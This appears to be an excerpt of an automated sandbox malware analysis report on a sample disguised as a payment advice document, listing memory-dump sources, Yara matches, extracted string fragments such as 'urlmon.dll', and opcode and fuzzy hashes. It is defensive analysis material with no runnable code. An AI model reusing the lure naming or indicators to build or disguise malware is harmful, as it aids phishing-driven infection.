                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            Strings
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017102BD
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017102E7
                                                                                                                                            • RTL: Re-Waiting, xrefs: 0171031E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            Strings
                                                                                                                                            • RTL: Resource at %p, xrefs: 01717B8E
                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01717B7F
                                                                                                                                            • RTL: Re-Waiting, xrefs: 01717BAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0171728C
                                                                                                                                            Strings
                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01717294
                                                                                                                                            • RTL: Resource at %p, xrefs: 017172A3
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017172C1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$@
                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$O$S$\$s
                                                                                                                                            • API String ID: 0-3854637164
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95a31cb8bc54784deccbb5f61a670964814556ad2616dacb61fa8a45566db6e2
                                                                                                                                            • Instruction ID: 30aacc4fa5cb1aaca16e8b3b950421c17200a1be68469b04687af145fe65ec98
                                                                                                                                            • Opcode Fuzzy Hash: 95a31cb8bc54784deccbb5f61a670964814556ad2616dacb61fa8a45566db6e2
                                                                                                                                            • Instruction Fuzzy Hash: 8221F8B1A14718AFDB14DF58DC81EEFB7B8EB89714F008509F919A7280D770A911CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9314687a4d3d00e3645cc920d30b5f29ce94d43908641f3a94f2d1207e57d058
                                                                                                                                            • Instruction ID: 4fd4e8128fea01d71965f55fa6273ef2a52cc89b62582a16f730a032fe9adb1b
                                                                                                                                            • Opcode Fuzzy Hash: 9314687a4d3d00e3645cc920d30b5f29ce94d43908641f3a94f2d1207e57d058
                                                                                                                                            • Instruction Fuzzy Hash: F91186B23802157BF720AA598C82FAB779CAB84F15F244015FB08AA2C1D6A4F81146B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 709d7e7604c08484369c6834e6242913435d0670c9ac66c480427806cc03c73a
                                                                                                                                            • Instruction ID: 5ab83d4174b46e68a6dfcf31263bdc5eb91bd9b095ada80f56076d96df679762
                                                                                                                                            • Opcode Fuzzy Hash: 709d7e7604c08484369c6834e6242913435d0670c9ac66c480427806cc03c73a
                                                                                                                                            • Instruction Fuzzy Hash: FC114C71614714BFEB10EB68CC41FEB77A8EB86714F008509FA09AB280D7747901C7A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 54b98381ec20bdd24b73bce386d245720ef4ee7bc42a88f554b5ade1a049834c
                                                                                                                                            • Instruction ID: d30af5a7e2d0bf1ac84361396a0d66107b4b133ffb1a08e6446f55c6a005aa06
                                                                                                                                            • Opcode Fuzzy Hash: 54b98381ec20bdd24b73bce386d245720ef4ee7bc42a88f554b5ade1a049834c
                                                                                                                                            • Instruction Fuzzy Hash: F4114C71614714BBEB10EBA4CC41FEB77ACEB86714F008509F919AB280D7747911C7A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 833ab006bb41b768f24449d9343a3f098698b46f778c2dd17de6ec4eeed56b87
                                                                                                                                            • Instruction ID: a664b4bff88eb479f28d322d0425746fdaf37d6cc56e23e7fa2a0f52e05f16ed
                                                                                                                                            • Opcode Fuzzy Hash: 833ab006bb41b768f24449d9343a3f098698b46f778c2dd17de6ec4eeed56b87
                                                                                                                                            • Instruction Fuzzy Hash: 3F1100B6E01218AF9B00DFA9D9419EFB7F9FF88210F04466AE915E7200E7745A15CBE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c683bd8c5f58cdb1a8279bf47339108df9a9eca5719a5ace5cb5d8630091204d
                                                                                                                                            • Instruction ID: 410d47767f0514e077d8b8dba5b46b92af484783c4c8b4f15bbb3c824a644efa
                                                                                                                                            • Opcode Fuzzy Hash: c683bd8c5f58cdb1a8279bf47339108df9a9eca5719a5ace5cb5d8630091204d
                                                                                                                                            • Instruction Fuzzy Hash: 78111FB6D0121CAF9B00DFA9D8409EEBBFDEF48200F04416AE919E7200E7709A01CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c8fd76cc1cdff96f6b08b796fba4466c0dd4da559138ac1ff1c37e8a17a1c88c
                                                                                                                                            • Instruction ID: e5ce32e2e48fb967645963409b5a154e5a039f78c82315586836c57b04a07dfc
                                                                                                                                            • Opcode Fuzzy Hash: c8fd76cc1cdff96f6b08b796fba4466c0dd4da559138ac1ff1c37e8a17a1c88c
                                                                                                                                            • Instruction Fuzzy Hash: 7B01CCB2214508BBDB04DF89DC80EEB77ADAF8C714F008208BA09A3240D630F851CBA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 008325e310a8952cd5066dcd62ec20ba238476d60bc5e19f268ef2484d34732f
                                                                                                                                            • Instruction ID: 47168d78734fde263df96e130fb17cac2ea80ca08afc4f8d2094a6c57d58c405
                                                                                                                                            • Opcode Fuzzy Hash: 008325e310a8952cd5066dcd62ec20ba238476d60bc5e19f268ef2484d34732f
                                                                                                                                            • Instruction Fuzzy Hash: 45012DB6C01219AFDB40DFE8D9409EFBBF8AB08204F04466AD505F3200F7705A04CBA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4841933730f8fc0c318796336bc5a32e8d0906fa290c2c4d5f3f03826db57fe2
                                                                                                                                            • Instruction ID: 998acc7434416265e9f854a967b43f3354362a524281f85588e3bd99b9d3b73b
                                                                                                                                            • Opcode Fuzzy Hash: 4841933730f8fc0c318796336bc5a32e8d0906fa290c2c4d5f3f03826db57fe2
                                                                                                                                            • Instruction Fuzzy Hash: 74F0E9737602526BE7105A5CBC80B96B7CCEB94334F248162F81C87292E635E4518760
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8db3f7784aed1fa3a20781010672b3f2e76811cc386e83de3f2fc8017ffd9428
                                                                                                                                            • Instruction ID: 166f07778784fbfacc79723b0a439e2ab16879cebec248ed5b4dc5e049dffb7d
                                                                                                                                            • Opcode Fuzzy Hash: 8db3f7784aed1fa3a20781010672b3f2e76811cc386e83de3f2fc8017ffd9428
                                                                                                                                            • Instruction Fuzzy Hash: 34F0BB71D246187AEB10EB60CC49EEF7378EFC8704F000285E90CA6150E6706A858B65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: acd5afb23d2719ecc6722df42d608edcd1e25a63ad32306f79fe95be0704f7ac
                                                                                                                                            • Instruction ID: a8b5f4bc05e64076fc2c54c2c177eee82ec567f839d5253f4cf288de1204fddd
                                                                                                                                            • Opcode Fuzzy Hash: acd5afb23d2719ecc6722df42d608edcd1e25a63ad32306f79fe95be0704f7ac
                                                                                                                                            • Instruction Fuzzy Hash: 0CF0F8752006087BD710DE99DC81EAB77ADEFC9610F004409BA19A7240D670B9118BB4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction ID: c1153362bad01a28e3167ffe46459d513ff137c5737b5f488aa058845aad18bd
                                                                                                                                            • Opcode Fuzzy Hash: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction Fuzzy Hash: 54E09A722007087BDB10EE59DC81EAB77ACEFC9718F000408FA09A7281D731B811CBB4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                            • API String ID: 0-1002149817
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                            • API String ID: 0-3236418099
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #>&"$$)jq$$8=5$4#~c$4~be$70#8$9#><$:>xq$=8:4$==0~$>38=$>85q$Q$~dbf$~dbf
                                                                                                                                            • API String ID: 0-1240490747
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                            • API String ID: 0-392141074
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                            • API String ID: 0-685823316
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                            • API String ID: 0-2304485323
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                            • API String ID: 0-2304485323
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$P$e$i$m$o$r$x
                                                                                                                                            • API String ID: 0-620024284
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: L$S$\$a$c$e$l
                                                                                                                                            • API String ID: 0-3322591375
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 9u$>$W$Z$t$}$}
                                                                                                                                            • API String ID: 0-97946228
                                                                                                                                            • Opcode ID: 68cd3f66003659ddfd1cce415c9d753927b941f79e15e3499c3d673410b5b78b
                                                                                                                                            • Instruction ID: d387fe1a0e887070e8996109b04aa36d638c999fc9caa1d10cd3ca16f825f3fb
                                                                                                                                            • Opcode Fuzzy Hash: 68cd3f66003659ddfd1cce415c9d753927b941f79e15e3499c3d673410b5b78b
                                                                                                                                            • Instruction Fuzzy Hash: E011CC10D1C7CED9DB12C6BC88086AEBFB11F23264F4883C9D4B52A2D2D2795706D7A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: F$P$T$f$r$x
                                                                                                                                            • API String ID: 0-2523166886
                                                                                                                                            • Opcode ID: 75727700a54a6fc3b54220a0d48bbb14a26b1b1d41819d55820bd74801552b0d
                                                                                                                                            • Instruction ID: f5b4eb2f807af4c72e66fa1287012feeb4f07d77b5375cc1e77c2958ec7c48fd
                                                                                                                                            • Opcode Fuzzy Hash: 75727700a54a6fc3b54220a0d48bbb14a26b1b1d41819d55820bd74801552b0d
                                                                                                                                            • Instruction Fuzzy Hash: 3351E170A10756BAE724EFA4CC44BEBB7F8EF94704F00461EA509A6190E7B5B644CBA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $i$l$o$u
                                                                                                                                            • API String ID: 0-2051669658
                                                                                                                                            • Opcode ID: 2f4f979e7a9d744d1f965f51a7f4a71002cb7048161383066d146dbbd0c2920d
                                                                                                                                            • Instruction ID: f8b0df65508b5fce62f4dcefa7233520d360880d38133609d043f28501ef2a83
                                                                                                                                            • Opcode Fuzzy Hash: 2f4f979e7a9d744d1f965f51a7f4a71002cb7048161383066d146dbbd0c2920d
                                                                                                                                            • Instruction Fuzzy Hash: 90615EB1A10205AFDB24DFA4CC84FEFB7F8AB88704F104569E919A7240E735BA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $i$l$o$u
                                                                                                                                            • API String ID: 0-2051669658
                                                                                                                                            • Opcode ID: a2b0a2fa60ee97802a189caadd85cb0c4c78e7d7a0dedcd186b56596e400df28
                                                                                                                                            • Instruction ID: 97a440402d851d2231ad21767c1772ea22fb96605ce962cce0d9bdeca365996c
                                                                                                                                            • Opcode Fuzzy Hash: a2b0a2fa60ee97802a189caadd85cb0c4c78e7d7a0dedcd186b56596e400df28
                                                                                                                                            • Instruction Fuzzy Hash: AE413BB1A10309AFDB21DFA5CC84FEFBBF8EB88704F104559E559A7240E770AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
